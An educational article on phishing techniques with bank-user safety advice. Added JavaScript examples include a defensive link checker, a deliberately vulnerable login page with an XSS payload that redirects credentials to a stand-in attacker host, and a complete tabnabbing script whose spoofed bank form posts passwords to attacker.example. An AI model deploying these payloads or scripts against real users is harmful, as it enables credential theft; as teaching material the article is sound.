Phishing
Introduction
As people increasingly rely on the Internet for business, personal finance and investment, Internet fraud becomes a greater and greater threat. One interesting species of Internet fraud is phishing. Phishing attacks use email messages and web sites designed to look as if they come from a known and legitimate organization, in order to deceive users into disclosing personal, financial, or computer account information. The attacker can then use this information for criminal purposes, such as identity theft, larceny, or fraud. Users are tricked into disclosing their information either by providing it through a web form or by downloading and installing hostile software.
To make the fraud harder to detect, phishers may also mask the URL; this is known as pharming. Pharming is an attack that redirects a web site's traffic to another, bogus web site. It can be carried out either by changing the hosts file on the victim's computer or by exploiting a vulnerability in DNS server software. DNS servers are the computers responsible for resolving Internet names into their real addresses; they are the "signposts" of the Internet. Compromised DNS servers are sometimes referred to as "poisoned". In May 2010 fraudsters targeted the Reserve Bank of India's web site, and those of six other banks, in a phishing attack, and on 2 December 2010 a phishing page imitating Facebook's site was also found.
Types of Phishing attack
Passive Phishing
In this type of phishing attack the attacker's web server impersonates the real server; the real server is not involved in the attack at all.
Active Phishing
In this type of attack the attacker's machine acts as a bridge (a proxy) between the user and the real server. This effectively gives it Man-in-the-Middle capabilities: it can read and alter everything the user sends to and receives from the real server, including credentials and one-time codes.
Common phishing techniques include sending a false URL to the user in a fraudulent e-mail and placing false links in web pages. In either case, once the user opens the URL he is connected to the attacker's web server, which appears to be the legitimate server and prompts him for his personal details.
There are three possible Phishing scenarios:
1. Wrong-domain server: The most common scenario. The attacker solicits the user to connect to a false URL whose domain name differs from the real server's domain name.
2. DNS-poisoning: The attacker has somehow managed to divert traffic destined for the real server's URL to his own machine. This case is similar to the previous one, except that the domain name the user sees is the genuine one. No solicitation is required, because the user reaches the attacker's machine whenever he attempts to connect to the real server.
3. Real Man-in-the-Middle: The attacker is in full control of one of the hops in the path between the user and the real server. In this case no solicitation is required, as the attacker’s machine fully controls any traffic that passes through it.
Phishing Techniques
Link manipulation
Most methods of phishing use some form of technical deception designed to make a link in an e-mail appear to belong to the spoofed organization. Misspelled URLs and the use of subdomains are common tricks. In the example URL http://www.yourbank.example.com/ it looks as though the link leads to the "example" section of the yourbank web site; in fact the registrable domain is example.com, so the URL points to a "yourbank" (i.e. phishing) host under the example.com site. Another common trick is to make the displayed text of a link (the text between the < A > tags) suggest a reliable destination while the href attribute actually goes to the phisher's site: a link whose visible text reads http://en.wikipedia.org/wiki/Genuine, and so appears to lead to an article entitled "Genuine", can have its href set to the article entitled "Deception", so clicking it takes you somewhere other than the text promises. Hovering over a link shows its real destination in the status bar (the lower left-hand corner of most browsers), which lets you verify where it will take you before clicking.
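The checks a mail filter would apply to the tricks described above, written out as an added example that is not part of the original article. It flags the subdomain trick (a brand name appearing under someone else's registrable domain) and a mismatch between the visible link text and the href, and additionally the userinfo trick (http://bank@attacker/), which the text does not mention. All host names, the brand table and the sample message are constructed for illustration, and the two-label "registrable domain" heuristic is a simplification noted in the code.

```javascript
// Added example: flag deceptive links in an HTML e-mail body.
// All host names and the sample message are constructed for illustration.

// Naive "registrable domain": the last two DNS labels. A real filter must use
// the Public Suffix List, since this heuristic is wrong for names like co.uk.
function registrableDomain(hostname) {
  const labels = hostname.toLowerCase().replace(/\.$/, '').split('.');
  return labels.slice(-2).join('.');
}

// Pull a host name out of link text such as "www.yourbank.example.com" or
// "https://yourbank.example/help". Returns null if the text is not URL-like.
function hostnameFromText(text) {
  const plain = text.replace(/<[^>]*>/g, '').trim();
  const m = plain.match(/^(?:https?:\/\/)?([a-z0-9.-]+\.[a-z]{2,})(?:[\/?#]|$)/i);
  return m ? m[1].toLowerCase() : null;
}

// brands maps a brand label to the domain it legitimately owns,
// e.g. { yourbank: 'yourbank.example' } (hypothetical).
function checkLink(href, text, brands) {
  const findings = [];
  let url;
  try {
    url = new URL(href);
  } catch (e) {
    return ['unparseable href: ' + href];
  }
  const host = url.hostname;
  const reg = registrableDomain(host);

  // Userinfo trick: everything before "@" is not part of the host, so
  // http://www.yourbank.example@attacker.example/ really goes to attacker.example.
  if (url.username || url.password) {
    findings.push('userinfo before "@" hides the real host ' + host);
  }

  // Subdomain trick: the brand name appears as a label, but the registrable
  // domain belongs to someone else (www.yourbank.example.com -> example.com).
  for (const [brand, brandDomain] of Object.entries(brands)) {
    if (host.split('.').includes(brand) && reg !== brandDomain) {
      findings.push(`"${brand}" is a subdomain of ${reg}, not of ${brandDomain}`);
    }
  }

  // Text/href mismatch: the visible text names one host, the href goes elsewhere.
  const textHost = hostnameFromText(text);
  if (textHost && registrableDomain(textHost) !== reg) {
    findings.push(`text shows ${textHost} but href goes to ${host}`);
  }
  return findings;
}

// Scan every <a href="...">text</a> in an HTML body (a regex is enough for
// this illustration; use a real HTML parser in production).
function findDeceptiveLinks(html, brands) {
  const re = /<a\b[^>]*\bhref\s*=\s*["']([^"']+)["'][^>]*>([\s\S]*?)<\/a>/gi;
  const results = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    const findings = checkLink(m[1], m[2], brands);
    if (findings.length > 0) results.push({ href: m[1], text: m[2], findings });
  }
  return results;
}

// Constructed sample message: one honest link and two deceptive ones.
const SAMPLE_EMAIL = `
<p>Dear customer, please verify your account at
<a href="http://www.yourbank.example.com/">www.yourbank.example.com</a>.</p>
<p>Or use our <a href="http://yourbank.example/">secure portal</a>.</p>
<p>Need help? <a href="https://yourbank.example@login.example.net/">https://yourbank.example/help</a></p>
`;
const BRANDS = { yourbank: 'yourbank.example' };

for (const r of findDeceptiveLinks(SAMPLE_EMAIL, BRANDS)) {
  console.log(r.href + '\n  ' + r.findings.join('\n  '));
}
```

Run with Node: the first and third links are reported, the "secure portal" link is not, because its registrable domain is the one the brand actually owns. The same comparison against the brand table is what a user does by hand when checking the status bar.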
Filter evasion
Phishers use images in place of text so that anti-phishing filters, which look for the wording commonly used in phishing e-mails, have no text to match against.
Website forgery
An attacker can even use flaws in a trusted web site's own scripts against the victim. These attacks (known as cross-site scripting) are particularly problematic because they direct the user to sign in at the bank's or service's own web page, where everything from the web address to the security certificate appears correct. In reality the link to the web site is crafted so that script injected through the flaw carries out the attack, for example by sending the submitted credentials to the attacker, which makes it very difficult to spot without specialist knowledge.
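An added example, not from the original article, of how such a crafted link works: a login page that reflects a query parameter into its own HTML without escaping, the payload that turns the bank's own form against its users, and the same page rendered with the parameter escaped. The hosts bank.example and attacker.example, the parameter name and the page markup are all hypothetical.

```javascript
// Added example: a login page that reflects a query parameter into its HTML.
// bank.example and attacker.example are hypothetical hosts.

// Minimal HTML escaping for text and double-quoted attribute values.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

const FORM_TAIL = `
  <input name="pass" type="password">
  <button>Sign in</button>
</form>`;

// VULNERABLE (deliberately): "user" is interpolated into an attribute verbatim,
// so a value containing "> breaks out of the input tag and injects markup.
function renderLoginVulnerable(params) {
  const user = params.get('user') || '';
  return `<form method="post" action="/login">
  <input name="user" value="${user}">` + FORM_TAIL;
}

// HARDENED: the same page with the parameter escaped for the attribute context.
function renderLoginHardened(params) {
  const user = escapeHtml(params.get('user') || '');
  return `<form method="post" action="/login">
  <input name="user" value="${user}">` + FORM_TAIL;
}

// The phisher's payload closes the value attribute, injects a script that
// re-points the bank's own form at the attacker, then opens a dummy tag so
// the leftover '">' of the original markup is swallowed harmlessly.
const PAYLOAD =
  '"><script>document.forms[0].action="https://attacker.example/collect"</script><i x="';

// The link sent to the victim. Host, path and TLS certificate are all the
// bank's; only the query string is hostile.
const CRAFTED_URL = 'https://bank.example/login?user=' + encodeURIComponent(PAYLOAD);

// What the server sees after the browser sends the crafted URL.
function paramsOf(urlString) {
  return new URL(urlString).searchParams;
}

// True if the rendered page contains a live <script> element.
function hasInjectedScript(html) {
  return /<script\b/i.test(html);
}

console.log('Crafted link:', CRAFTED_URL);
console.log('\nVulnerable page:\n' + renderLoginVulnerable(paramsOf(CRAFTED_URL)));
console.log('\nHardened page:\n' + renderLoginHardened(paramsOf(CRAFTED_URL)));
```

In the vulnerable rendering the injected script runs in the bank's origin and the password field posts to attacker.example while the address bar still shows bank.example; in the hardened rendering the same payload is just an odd-looking prefilled user name.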
Phone phishing
Not all phishing attacks require a fake website. Messages that claimed to be from a bank told users to dial a phone number regarding problems with their bank accounts. Once the phone number (owned by the phisher, and provided by a Voice over IP service) was dialled, prompts told users to enter their account numbers and PIN. Vishing (voice phishing) sometimes uses fake caller-ID data to give the appearance that calls come from a trusted organization.
Tabnabbing
Tabnabbing is a phishing attack that persuades users to submit their login names and passwords to an impersonation of a popular web site by convincing them that the site is genuine. It exploits users' trust in, and inattention to, their open tabs, together with the ability of a modern web page to rewrite its own title, icon and contents long after it has loaded. The page starts out looking like something of average interest; when it is left unattended for a while, a script rewrites it as an impersonation of a well-known web site. A user who returns after some time sees the rewritten page, may take it for the legitimate site, and enters login, password and other details that are then misused. The attack is more likely to succeed if the script checks which well-known web sites the user has loaded in the past or has open in other tabs and impersonates one of those. It works even with JavaScript disabled, by using the "meta refresh" meta element to navigate the tab to the impersonation after a delay.
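The attacker-side script behind a tabnabbing page, as an added example that is not part of the original article. It uses the Page Visibility API: a timer starts when the tab is hidden, is cancelled if the user comes back early, and otherwise rewrites the title, favicon and body. The YourBank branding, the attacker.example URLs and the five-second dwell time are hypothetical; the document and window objects are passed in so the same code can be exercised against a stub outside a browser.

```javascript
// Added example: the attacker-side script behind a tabnabbing page.
// attacker.example, the YourBank branding and the timings are hypothetical.

// What the innocuous page turns into once the visitor has looked away.
const SPOOF = {
  title: 'YourBank - Sign in',
  favicon: 'https://attacker.example/static/yourbank.ico',
  body: `<h1>YourBank</h1>
<p>Your session has expired. Please sign in again.</p>
<form method="post" action="https://attacker.example/collect">
  <input name="user" placeholder="Customer ID">
  <input name="pass" type="password" placeholder="Password">
  <button>Sign in</button>
</form>`,
};

// Replaces title, favicon and body of the current tab with the impersonation.
function rewriteAs(doc, spoof) {
  doc.title = spoof.title;
  const icon = doc.createElement('link');
  icon.rel = 'icon';
  icon.href = spoof.favicon;
  doc.head.appendChild(icon);
  doc.body.innerHTML = spoof.body;
}

// Wires the attack to the Page Visibility API: start a timer when the tab is
// hidden, cancel it if the user returns early, rewrite the page if it fires.
// doc and win are injected so the code runs in a browser or against a stub.
function installTabnab(doc, win, dwellMs, spoof = SPOOF) {
  const state = { timer: null, rewritten: false };
  doc.addEventListener('visibilitychange', () => {
    if (state.rewritten) return;
    if (doc.hidden) {
      state.timer = win.setTimeout(() => {
        state.rewritten = true;
        state.timer = null;
        rewriteAs(doc, spoof);
      }, dwellMs);
    } else if (state.timer !== null) {
      win.clearTimeout(state.timer);
      state.timer = null;
    }
  });
  return state;
}

// The no-JavaScript variant the text mentions: a meta refresh that navigates
// the tab to the impersonation after ten minutes, whether or not it is in the
// foreground (hypothetical URL):
//   <meta http-equiv="refresh" content="600;url=https://attacker.example/yourbank/">

// In a real browser, arm the attack with a five-second dwell time.
if (typeof document !== 'undefined') {
  installTabnab(document, window, 5000);
}
```

Nothing in the rewritten tab is inherited from the real bank; the only thing that has to match is the user's memory of what the tab looked like, which is why checking the address bar before typing a password defeats it.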
Best practices against phishing attack for Bank users
1. Always type the correct URL into the address bar yourself rather than following a link.
2. Never reply to any e-mail asking you to enter details such as username, password or date of birth.
3. Check for the https protocol in the address bar, a padlock icon and a valid certificate. Note that phishing sites can also obtain certificates, so the padlock only proves that the connection is encrypted; you must still check that the domain name is your bank's.
4. Avoid using cyber cafes for Internet banking.
5. Suspected cases of phishing must be reported to the bank immediately.
6. Use anti-phishing tools such as the Netcraft toolbar, SpoofGuard, the eBay Toolbar, etc.
Where to report phishing incidents
CERT-In Incident Response Help Desk
Tel : 1600-11-4949
FAX : 1600-11-6969
E-mail: incident@cert-in.org.in